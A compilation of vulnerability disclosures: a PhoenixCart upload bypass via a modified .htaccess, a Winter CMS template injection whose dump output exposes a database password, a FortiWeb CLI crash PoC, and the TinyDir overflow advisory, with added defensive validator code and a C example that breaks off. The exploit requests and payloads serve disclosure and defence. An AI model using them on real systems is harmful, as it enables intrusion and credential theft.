en-US,en;q=0.9<br />Cookie: cepcAdminID=ukrk3ssr0jd6iqsnn9ofuccmbt<br />Connection: close<br /><br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />Content-Disposition: form-data; name="formid"<br /><br />733e378dc8154accdbfd80762cc385f48d5566560ac3b264db19393f9beb268e<br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />Content-Disposition: form-data; name="products_date_added"<br /><br />2023-12-06 11:36:36<br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />Content-Disposition: form-data; name="products_status"<br /><br />1<br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />Content-Disposition: form-data; name="products_quantity"<br /><br />0<br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />Content-Disposition: form-data; name="products_date_available"<br /><br />2023-12-14 00:00:00<br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />Content-Disposition: form-data; name="manufacturers_id"<br /><br /><br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />Content-Disposition: form-data; name="products_model"<br /><br /><br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />Content-Disposition: form-data; name="products_tax_class_id"<br /><br />1<br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />Content-Disposition: form-data; name="products_price"<br /><br />1000.0000<br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />Content-Disposition: form-data; name="products_price_gross"<br /><br />1070<br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />Content-Disposition: form-data; name="products_weight"<br /><br />1.00<br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />Content-Disposition: form-data; name="products_gtin"<br /><br />00000000000001<br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />Content-Disposition: form-data; name="products_name[1]"<br /><br />pwned<br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />Content-Disposition: form-data; name="products_description[1]"<br /><br />pwned your services<br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br 
/>Content-Disposition: form-data; name="products_url[1]"<br /><br /><br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />Content-Disposition: form-data; name="products_seo_title[1]"<br /><br /><br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />Content-Disposition: form-data; name="products_seo_description[1]"<br /><br /><br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />Content-Disposition: form-data; name="products_seo_keywords[1]"<br /><br /><br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />Content-Disposition: form-data; name="products_image"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />Content-Disposition: form-data; name="products_image_large_1"; filename=".htaccess"<br />Content-Type: application/octet-stream<br /><br /># $Id$<br />#<br /># This is used to restrict access to this folder to anything other<br /># than images<br /><br /># Prevents any script files from being accessed from the images folder<br /><FilesMatch "\.(php([0-9]|s)?|s?p?html|cgi|pl|exe)$"><br /> <IfModule mod_authz_core.c><br /> # Require all denied<br /> </IfModule><br /><br /> <IfModule !mod_authz_core.c><br /> Order Deny,Allow<br /> # Deny from all<br /> Allow from all<br /> </IfModule><br /></FilesMatch><br /><br />Options -Indexes<br /><br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />Content-Disposition: form-data; name="products_image_htmlcontent_1"<br /><br /><br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1--<br /><br />```<br /><br />[+]Follow-up request (info.php was uploaded through the same form; with the modified .htaccess in place the server now executes it instead of denying it):<br />```HTTP<br />GET /PhoenixCart/images/info.php HTTP/1.1<br />Host: pwnedhost7.com<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Accept-Encoding: gzip, deflate, br<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/CE-Phoenix/2023/PhoenixCart-1.0.8.20)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/12/phoenixcart-10820-file-upload-bypass.html)<br /><br />## Time spent:<br />00:17:00<br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html<br />https://cxsecurity.com/ and https://www.exploit-db.com/<br />0day Exploit DataBase https://0day.today/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /></code></pre>
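<p>Added example, not PhoenixCart code: the server-side validation an image upload handler needs so that the request above fails at the first step. It reduces the client-supplied name to its last path component, refuses any name beginning with a dot (so .htaccess and .user.ini never reach the images directory), accepts only an allow-listed image extension, rejects stems containing a second extension such as info.php.png, and requires the content to start with the magic bytes of the declared type. The function names and sample inputs are the example's own.</p>

```python
"""Allow-list validation for an image upload handler (added example; not PhoenixCart code)."""
import os
import re

IMAGE_MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
STEM_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")   # no dot allowed, so "info.php.png" cannot pass


def validate_image_upload(filename: str, data: bytes):
    """Return (True, safe_name) for an acceptable image, else (False, reason).

    The checks run in the order in which the request above would be stopped: directory
    components are dropped, dotfiles are refused, the extension must be allow-listed, the
    stem may not carry a second extension, and the bytes must match the declared type.
    """
    name = os.path.basename(filename.replace("\\", "/"))   # strip directories, Windows separators too
    if not name or name.startswith("."):
        return False, "empty name or dotfile rejected"
    stem, ext = os.path.splitext(name)
    ext = ext.lower()
    if ext not in IMAGE_MAGIC:
        return False, "extension %r not in allow-list" % ext
    if not STEM_RE.match(stem):
        return False, "stem must match [A-Za-z0-9_-]{1,64}"
    if not data.startswith(IMAGE_MAGIC[ext]):
        return False, "content does not match declared image type"
    return True, stem + ext


# Constructed sample uploads (not from a real capture).
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
SAMPLE_GIF = b"GIF89a" + b"\x00" * 8

if __name__ == "__main__":
    for fname, blob in ((".htaccess", b"Allow from all"), ("info.php", b"x"),
                        ("info.php.png", SAMPLE_PNG), ("../../pic.PNG", SAMPLE_PNG)):
        print(fname, "->", validate_image_upload(fname, blob))
```

<p>The decisive control is in the web server, not in this validator. The request above works because Apache reads a .htaccess from the images directory, so anything that can write there can undo the "Require all denied" rule. Set AllowOverride None for the upload directory in the vhost configuration, put the FilesMatch deny rule (or the removal of the PHP handler) there, and ideally serve uploads from a separate host with no script handlers at all; then a polyglot or a stray .htaccess that slips past the validator is still never executed.</p>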
<pre><code># Exploit Title: Winter CMS 1.2.2 / 1.2.3 - Server-Side Template Injection (SSTI) (Authenticated)<br /># Exploit Author: tmrswrr<br /># Date: 12/05/2023<br /># Vendor: https://wintercms.com/<br /># Software Link: https://github.com/wintercms/winter/releases/v1.2.2<br /># Vulnerable Version(s): 1.2.2 / 1.2.3<br /># Tested : https://www.softaculous.com/demos/WinterCMS<br /><br /><br />1 ) Log in with admin credentials and open CMS > Pages > Plugin components: <br /> https://demos6.demo.com/WinterCMS/backend/cms#secondarytab-cmslangeditormarkup<br />2 ) Write the SSTI payload : {{7*7}}<br />3 ) Save it, then click Preview : <br /> https://demos6.demo.com/WinterCMS/demo/plugins<br />4 ) You will see the result : <br /> 49<br /> Payload :<br /> {{ dump() }}<br /> Result (the dump exposes the application's database configuration, including the MySQL credentials) :<br /> <br /> "*::database" => array:4 [▼<br /> "default" => "mysql"<br /> "connections" => array:4 [▼<br /> "sqlite" => array:5 [▼<br /> "database" => "/home/soft/public_html/WinterCMSmcviotyn9i/storage/database.sqlite"<br /> "driver" => "sqlite"<br /> "foreign_key_constraints" => true<br /> "prefix" => ""<br /> "url" => null<br /> ]<br /> "mysql" => array:15 [▼<br /> "charset" => "utf8mb4"<br /> "collation" => "utf8mb4_unicode_ci"<br /> "database" => "soft_pw3qsny"<br /> "driver" => "mysql"<br /> "engine" => "InnoDB"<br /> "host" => "localhost"<br /> "options" => []<br /> "password" => "8QSz9(pT)3"<br /> "port" => 3306<br /> "prefix" => ""<br /> "prefix_indexes" => true<br /> "strict" => true<br /> "unix_socket" => ""<br /> "url" => null<br /> "username" => "soft_pw3qsny"<br /> ]<br /> "pgsql" => array:12 [▶]<br /> "sqlsrv" => array:10 [▶]<br /> ]<br /> "migrations" => "migrations"<br /> "redis" => array:4 [▼<br /> "client" => "phpredis"<br /> "options" => array:2 [▼<br /> "cluster" => "redis"<br /> "prefix" => "winter_database_"<br /> ]<br /> "default" => array:5 [▼<br /> "database" => "0"<br /> "host" => "127.0.0.1"<br /> "password" => null<br /> "port" => "6379"<br /> "url" => null<br /> ]<br /> 
"cache" => array:5 [▼<br /> "database" => "1"<br /> "host" => "127.0.0.1"<br /> "password" => null<br /> "port" => "6379"<br /> "url" => null<br /> ]<br /> ]<br /> ]<br /> ]<br /></code></pre>
<pre><code>;; <br />;; FortiWeb VM (v7.4.0 build577) Post-auth CLI Crash<br />;; <br />;; (...)<br />;; <br />;; code610 / some debug notes fyi<br />;; <br />;; 17.11.2023 @ 23:33<br />;; <br /><br />FortiWeb # diagnose debug crashlog show<br />2023-11-16 05:07:00 <004315> application cli<br />2023-11-16 05:07:00 <004315> *** signal Segmentation fault received ***<br />2023-11-16 05:07:00 <004315> RIP 00007fdd1febf44f<br />2023-11-16 05:07:00 <004315> EFLAGS 0000000000010206<br />2023-11-16 05:07:00 <004315> RAX 0000000000000000<br />2023-11-16 05:07:00 <004315> RBX 0000000000000005<br />2023-11-16 05:07:00 <004315> RCX 00005642dd55d4b1<br />2023-11-16 05:07:00 <004315> RDX 00007ffca74d8ff0<br />2023-11-16 05:07:00 <004315> RSI 0000000000000000<br />2023-11-16 05:07:00 <004315> RDI 00007ffca74d82d0<br />2023-11-16 05:07:00 <004315> RBP 0000000000000000<br />2023-11-16 05:07:00 <004315> RSP 00007ffca74d8208<br />2023-11-16 05:07:00 <004315> CS 0000<br />2023-11-16 05:07:00 <004315> GS 0000<br />2023-11-16 05:07:00 <004315> FS 0033<br />2023-11-16 05:07:00 <004315> Trap 000000000000000e<br />2023-11-16 05:07:00 <004315> Error 0000000000000006<br />2023-11-16 05:07:00 <004315> Oldmask 0000000000000000<br />2023-11-16 05:07:00 <004315> CR2 00007ffca74d9020<br />2023-11-16 05:07:00 <004315> [0x00007fdd1febf44f] ==> /lib64/libc.so.6 + 0x000000000013d44f)<br />2023-11-16 05:07:00 <004315> [0x00007fdd21329ae3] => /lib64/libconfd.so (cfg_backup+0x00000193)<br />2023-11-16 05:07:00 <004315> [0x00007fdd21329ae3] => /lib64/libconfd.so (cfg_backup+0x00000193)<br />2023-11-16 05:07:38 <004315> application cli<br />2023-11-16 05:07:38 <004315> *** signal Segmentation fault received ***<br />2023-11-16 05:07:38 <004315> RIP 00007fdd1fec034f<br />2023-11-16 05:07:38 <004315> EFLAGS 0000000000010206<br />2023-11-16 05:07:38 <004315> RAX 0000000000000000<br />2023-11-16 05:07:38 <004315> RBX 0000000000000006<br />2023-11-16 05:07:38 <004315> RCX 00005642dd55403b<br />2023-11-16 
05:07:38 <004315> RDX 00007ffca74d8fe0<br />2023-11-16 05:07:38 <004315> RSI 0000000000000000<br />2023-11-16 05:07:38 <004315> RDI 00007ffca74d82d0<br />2023-11-16 05:07:38 <004315> RBP 0000000000000000<br />2023-11-16 05:07:38 <004315> RSP 00007ffca74d8208<br />2023-11-16 05:07:38 <004315> CS 0000<br />2023-11-16 05:07:38 <004315> GS 0000<br />2023-11-16 05:07:38 <004315> FS 0033<br />2023-11-16 05:07:38 <004315> Trap 000000000000000e<br />2023-11-16 05:07:38 <004315> Error 0000000000000006<br />2023-11-16 05:07:38 <004315> Oldmask 0000000000000000<br />2023-11-16 05:07:38 <004315> CR2 00007ffca74d9010<br />2023-11-16 05:07:38 <004315> [0x00007fdd1fec034f] ==> /lib64/libc.so.6 + 0x000000000013e34f)<br />2023-11-16 05:07:38 <004315> [0x00007fdd21329ae3] => /lib64/libconfd.so (cfg_backup+0x00000193)<br />2023-11-16 05:07:38 <004315> [0x00007fdd21329ae3] => /lib64/libconfd.so (cfg_backup+0x00000193)<br />2023-11-16 05:08:00 <004315> application cli<br />2023-11-16 05:08:00 <004315> *** signal Segmentation fault received ***<br />2023-11-16 05:08:00 <004315> RIP 00007fdd1febf284<br />2023-11-16 05:08:00 <004315> EFLAGS 0000000000010246<br />2023-11-16 05:08:00 <004315> RAX 0000000000000000<br />2023-11-16 05:08:00 <004315> RBX 0000000000000006<br />2023-11-16 05:08:00 <004315> RCX 00005642dd558a80<br />2023-11-16 05:08:00 <004315> RDX 00007ffca74d9030<br />2023-11-16 05:08:00 <004315> RSI ffffffffffffffc0<br />2023-11-16 05:08:00 <004315> RDI 00007ffca74d82d0<br />2023-11-16 05:08:00 <004315> RBP 0000000000000000<br />2023-11-16 05:08:00 <004315> RSP 00007ffca74d8208<br />2023-11-16 05:08:00 <004315> CS 0000<br />2023-11-16 05:08:00 <004315> GS 0000<br />2023-11-16 05:08:00 <004315> FS 0033<br />2023-11-16 05:08:00 <004315> Trap 000000000000000e<br />2023-11-16 05:08:00 <004315> Error 0000000000000006<br />2023-11-16 05:08:00 <004315> Oldmask 0000000000000000<br />2023-11-16 05:08:00 <004315> CR2 00007ffca74d9000<br />2023-11-16 05:08:00 <004315> [0x00007fdd1febf284] 
==> /lib64/libc.so.6 + 0x000000000013d284)<br />2023-11-16 05:08:00 <004315> [0x00007fdd21329ae3] => /lib64/libconfd.so (cfg_backup+0x00000193)<br />2023-11-16 05:08:00 <004315> [0x00007fdd21329ae3] => /lib64/libconfd.so (cfg_backup+0x00000193)<br /><br /><br />FortiWeb # ;; version: FortiWeb VM (v7.4.0 build577) <br /><br /><br /><br />;; quick poc:<br /><br />fgweb_cli> execute backup cli-config tftp SOMEFILENAME 1.1.1.1 PASSWD_LEN_IS_OUR_CRASHER <br /><br />;; <br />;; https://code610.blogspot.com/search?q=fortigate<br />;; <br /></code></pre>
<pre><code>--[ HNS-2023-04 - HN Security Advisory - https://security.humanativaspa.it/<br /><br />* Title: Buffer overflow vulnerabilities with long path names in TinyDir<br />* Product: TinyDir <= 1.2.5<br />* Author: Marco Ivaldi <marco.ivaldi@hnsecurity.it><br />* Date: 2023-12-04<br />* CVE ID: CVE-2023-49287<br />* Severity: High - 7.7 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H<br />* Vendor URL: https://github.com/cxong/tinydir<br />* Advisory URL: https://github.com/cxong/tinydir/security/advisories/GHSA-jf5r-wgf4-qhxf<br /><br /><br />--[ 0 - Table of contents<br /><br />1 - Summary<br />2 - Background<br />3 - Vulnerabilities<br />4 - Proof of concept<br />5 - Affected products<br />6 - Remediation<br />7 - Disclosure timeline<br />8 - Acknowledgements<br />9 - References<br /><br /><br />--[ 1 - Summary<br /><br />"This is the OG we all want to be, congrats on 20yrs of (public) vulns!"<br /> -- Erik Cabetas<br /><br />TinyDir is a lightweight, portable and easy to integrate C directory and<br />file reader. It wraps dirent for POSIX and FindFirstFile for Windows.<br /><br />We reviewed TinyDir's source code hosted on GitHub [1] and identified some<br />security vulnerabilities that may cause memory corruption. 
Their impacts<br />range from denial of service to potential arbitrary code execution.<br /><br /><br />--[ 2 - Background<br /><br />While auditing another codebase, we noticed that it included TinyDir.<br />Since this small but successful project is used in hundreds of repositories<br />[2], we decided to review it in search of security bugs.<br /><br /><br />--[ 3 - Vulnerabilities<br /><br />We spotted some buffer overflow vulnerabilities with long path names in the<br />tinydir_file_open() function, at the marked locations in the following<br />source code listing:<br /><br />```c<br />/* Open a single file given its path */<br />_TINYDIR_FUNC<br />int tinydir_file_open(tinydir_file *file, const _tinydir_char_t *path)<br />{<br /> tinydir_dir dir;<br /> int result = 0;<br /> int found = 0;<br /> _tinydir_char_t dir_name_buf[_TINYDIR_PATH_MAX];<br /> _tinydir_char_t file_name_buf[_TINYDIR_FILENAME_MAX];<br /> _tinydir_char_t *dir_name;<br /> _tinydir_char_t *base_name;<br />#if (defined _MSC_VER || defined __MINGW32__)<br /> _tinydir_char_t drive_buf[_TINYDIR_PATH_MAX];<br /> _tinydir_char_t ext_buf[_TINYDIR_FILENAME_MAX];<br />#endif<br /><br /> if (file == NULL || path == NULL || _tinydir_strlen(path) == 0)<br /> {<br /> errno = EINVAL;<br /> return -1;<br /> }<br /> if (_tinydir_strlen(path) + _TINYDIR_PATH_EXTRA >= _TINYDIR_PATH_MAX)<br /> {<br /> errno = ENAMETOOLONG;<br /> return -1;<br /> }<br /><br /> /* Get the parent path */<br />#if (defined _MSC_VER || defined __MINGW32__)<br />#if ((defined _MSC_VER) && (_MSC_VER >= 1400))<br /> errno = _tsplitpath_s(<br /> path,<br /> drive_buf, _TINYDIR_DRIVE_MAX,<br /> dir_name_buf, _TINYDIR_FILENAME_MAX,<br /> file_name_buf, _TINYDIR_FILENAME_MAX,<br /> ext_buf, _TINYDIR_FILENAME_MAX);<br />#else<br /> _tsplitpath(<br /> path,<br /> drive_buf,<br /> dir_name_buf,<br /> file_name_buf,<br /> ext_buf); /* VULN: potential buffer overflow due to insecure splitpath() API<br /> 
(https://learn.microsoft.com/en-us/cpp/c-runtime-library/reference/splitpath-wsplitpath?view=msvc-170) */<br />#endif<br /><br /> if (errno)<br /> {<br /> return -1;<br /> }<br /><br />/* _splitpath_s not work fine with only filename and widechar support */<br />#ifdef _UNICODE<br /> if (drive_buf[0] == L'\xFEFE')<br /> drive_buf[0] = '\0';<br /> if (dir_name_buf[0] == L'\xFEFE')<br /> dir_name_buf[0] = '\0';<br />#endif<br /><br /> /* Emulate the behavior of dirname by returning "." for dir name if it's<br /> empty */<br /> if (drive_buf[0] == '\0' && dir_name_buf[0] == '\0')<br /> {<br /> _tinydir_strcpy(dir_name_buf, TINYDIR_STRING("."));<br /> }<br /> /* Concatenate the drive letter and dir name to form full dir name */<br /> _tinydir_strcat(drive_buf, dir_name_buf);<br /> dir_name = drive_buf;<br /> /* Concatenate the file name and extension to form base name */<br /> _tinydir_strcat(file_name_buf, ext_buf); /* VULN: since sizeof(file_name_buf) + sizeof(ext_buf) is larger than<br /> sizeof(file_name_buf), we have a potential stack buffer overflow */<br /> base_name = file_name_buf;<br />#else<br /> _tinydir_strcpy(dir_name_buf, path);<br /> dir_name = dirname(dir_name_buf);<br /> _tinydir_strcpy(file_name_buf, path); /* VULN: since sizeof(file_name_buf) is smaller than the maximum path length, <br /> we have a potential stack buffer overflow */<br /> base_name = basename(file_name_buf);<br />#endif<br /><br /> /* Special case: if the path is a root dir, open the parent dir as the file */<br />#if (defined _MSC_VER || defined __MINGW32__)<br /> if (_tinydir_strlen(base_name) == 0)<br />#else<br /> if ((_tinydir_strcmp(base_name, TINYDIR_STRING("/"))) == 0)<br />#endif<br /> {<br /> memset(file, 0, sizeof * file);<br /> file->is_dir = 1;<br /> file->is_reg = 0;<br /> _tinydir_strcpy(file->path, dir_name);<br /> file->extension = file->path + _tinydir_strlen(file->path);<br /> return 0;<br /> }<br /><br /> /* Open the parent directory */<br /> if 
(tinydir_open(&dir, dir_name) == -1)<br /> {<br /> return -1;<br /> }<br /><br /> /* Read through the parent directory and look for the file */<br /> while (dir.has_next)<br /> {<br /> if (tinydir_readfile(&dir, file) == -1)<br /> {<br /> result = -1;<br /> goto bail;<br /> }<br /> if (_tinydir_strcmp(file->name, base_name) == 0)<br /> {<br /> /* File found */<br /> found = 1;<br /> break;<br /> }<br /> tinydir_next(&dir);<br /> }<br /> if (!found)<br /> {<br /> result = -1;<br /> errno = ENOENT;<br /> }<br /><br />bail:<br /> tinydir_close(&dir);<br /> return result;<br />}<br />```<br /><br /><br />--[ 4 - Proof of concept<br /><br />Step-by-step instructions to replicate the third vulnerability on Linux:<br /><br />```<br />$ git clone https://github.com/cxong/tinydir<br />$ cd tinydir/samples/<br />$ gcc -g -fsanitize=address -I.. file_open_sample.c -o file_open_sample<br />$ mkdir -p AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/<br />$ ./file_open_sample AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />Path: ./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />Name: 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />Extension: <br />Is dir? yes<br />Is regular file? no<br />$ ./file_open_sample AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/<br />=================================================================<br />==2533==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffd1ecabeb0 at pc 0x7f37b22544bf bp 0x7ffd1ecaac10 sp 0x7ffd1ecaa3b8<br />WRITE of size 513 at 0x7ffd1ecabeb0 thread T0<br /> #0 0x7f37b22544be in __interceptor_strcpy ../../../../src/libsanitizer/asan/asan_interceptors.cpp:440<br /> #1 0x5625cf301b69 in tinydir_file_open ../tinydir.h:711<br /> #2 0x5625cf3021f4 in main /home/raptor/tinydir/samples/file_open_sample.c:12<br /> #3 0x7f37b1e29d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58<br /> #4 0x7f37b1e29e3f in __libc_start_main_impl ../csu/libc-start.c:392<br /> #5 0x5625cf3004e4 in _start (/home/raptor/tinydir/samples/file_open_sample+0x24e4)<br /><br />Address 0x7ffd1ecabeb0 is located in stack of thread T0 at offset 4704 in frame<br /> #0 0x5625cf3018c3 in tinydir_file_open ../tinydir.h:641<br /><br /> This frame has 3 object(s):<br /> [48, 4184) 'dir' (line 642)<br /> [4448, 4704) 'file_name_buf' (line 646)<br /> [4768, 8864) 'dir_name_buf' (line 645) <== Memory access at offset 4704 partially underflows 
this variable<br />HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork<br /> (longjmp and C++ exceptions *are* supported)<br />SUMMARY: AddressSanitizer: stack-buffer-overflow ../../../../src/libsanitizer/asan/asan_interceptors.cpp:440 in __interceptor_strcpy<br />Shadow bytes around the buggy address:<br /> 0x100023d8d780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br /> 0x100023d8d790: 00 00 00 00 00 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2<br /> 0x100023d8d7a0: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2<br /> 0x100023d8d7b0: f2 f2 f2 f2 f2 f2 00 00 00 00 00 00 00 00 00 00<br /> 0x100023d8d7c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br />=>0x100023d8d7d0: 00 00 00 00 00 00[f2]f2 f2 f2 f2 f2 f2 f2 00 00<br /> 0x100023d8d7e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br /> 0x100023d8d7f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br /> 0x100023d8d800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br /> 0x100023d8d810: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br /> 0x100023d8d820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br />Shadow byte legend (one shadow byte represents 8 application bytes):<br /> Addressable: 00<br /> Partially addressable: 01 02 03 04 05 06 07 <br /> Heap left redzone: fa<br /> Freed heap region: fd<br /> Stack left redzone: f1<br /> Stack mid redzone: f2<br /> Stack right redzone: f3<br /> Stack after return: f5<br /> Stack use after scope: f8<br /> Global redzone: f9<br /> Global init order: f6<br /> Poisoned by user: f7<br /> Container overflow: fc<br /> Array cookie: ac<br /> Intra object redzone: bb<br /> ASan internal: fe<br /> Left alloca redzone: ca<br /> Right alloca redzone: cb<br /> Shadow gap: cc<br />==2533==ABORTING<br />```<br /><br /><br />--[ 5 - Affected products<br /><br />TinyDir 1.2.5 and earlier versions are affected by the vulnerabilities<br />discussed in this advisory.<br /><br /><br />--[ 6 - Remediation<br /><br 
/>TinyDir developers have released version 1.2.6 [3] that addresses the<br />vulnerabilities discussed in this advisory.<br /><br />Please check the official TinyDir channels for further information about<br />fixes.<br /><br /><br />--[ 7 - Disclosure timeline<br /><br />2023-11-30: Vulnerabilities reported via GitHub security advisories [4].<br />2023-12-01: Proof of concept provided at the request of TinyDir developers.<br />2023-12-02: Vulnerabilities fixed in TinyDir's master branch on GitHub.<br />2023-12-03: TinyDir 1.2.6 released and GitHub advisory published.<br />2023-12-04: GitHub issued CVE-2023-49287 and we published this advisory.<br /><br /><br />--[ 8 - Acknowledgements<br /><br />We would like to thank TinyDir developers for triaging and quickly fixing<br />the reported vulnerabilities.<br /><br /><br />--[ 9 - References<br /><br />[1] https://github.com/cxong/tinydir<br />[2] https://github.com/search?q=tinydir.h&type=code<br />[3] https://github.com/cxong/tinydir/releases/tag/1.2.6<br />[4] https://github.com/cxong/tinydir/security<br /><br /><br />Copyright (c) 2023 Marco Ivaldi and Humanativa Group. All rights reserved.<br /></code></pre>
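Added illustration of the third vulnerability (the POSIX branch of tinydir_file_open() in section 3, the one triggered by the proof of concept in section 4). This is example code written for this page, not code from the advisory, from TinyDir, or from the 1.2.6 fix. The buffer sizes are the ones visible in the ASan frame layout above (file_name_buf 256 bytes, dir_name_buf 4096 bytes); the value of _TINYDIR_PATH_EXTRA, the function names and the bounded split routine are assumptions of this example. It rebuilds the PoC's 512-character path (two 255-character components, each followed by a slash) and shows that the whole-path length check admits it while an unbounded copy into the 256-byte file-name buffer writes 513 bytes, whereas a split that bounds each component copies only what fits and fails with ENAMETOOLONG otherwise.

```c
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Buffer sizes as seen in the advisory's ASan frame layout. */
#define TD_PATH_MAX     4096   /* dir_name_buf */
#define TD_FILENAME_MAX  256   /* file_name_buf */
#define TD_PATH_EXTRA      2   /* assumed value of _TINYDIR_PATH_EXTRA */

/* The only length check tinydir_file_open() performs before copying:
 * it bounds the whole path against dir_name_buf, not the copy into
 * file_name_buf. Returns 1 when the path is admitted. */
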